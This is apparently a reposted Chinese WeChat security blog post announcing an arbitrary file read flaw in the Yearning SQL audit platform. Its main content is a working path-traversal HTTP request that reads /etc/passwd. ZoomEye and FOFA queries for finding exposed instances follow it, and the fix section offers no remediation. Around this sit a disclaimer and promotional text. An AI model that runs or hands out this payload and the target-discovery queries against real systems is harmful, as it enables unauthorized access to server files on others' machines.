最近很多小伙伴反馈看不到最新的推文,由于微信公众号推送机制改变了,解决办法:
给公众号设为星标
棉花糖博客地址
文章中涉及的漏洞均已修复,敏感信息已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责。
漏洞详情
01
界面截图
02
漏洞复现
03
payload
GET /front/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: 1
语法
zoomeye:
04
app:"Yearning"
fofa:
app="Yearning"修复建议
05
没有,爱修不修打个广告
人太懒
放在这里一大篇也让大家心烦
有兴趣自己点开看吧👇
END
那么又到了文末我们应该?
1、关注!点赞!转发!
3、封面获取请后台回复:20240116封面
原文始发于微信公众号(棉花糖网络安全圈):Yearning front 任意文件读取【附POC】
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论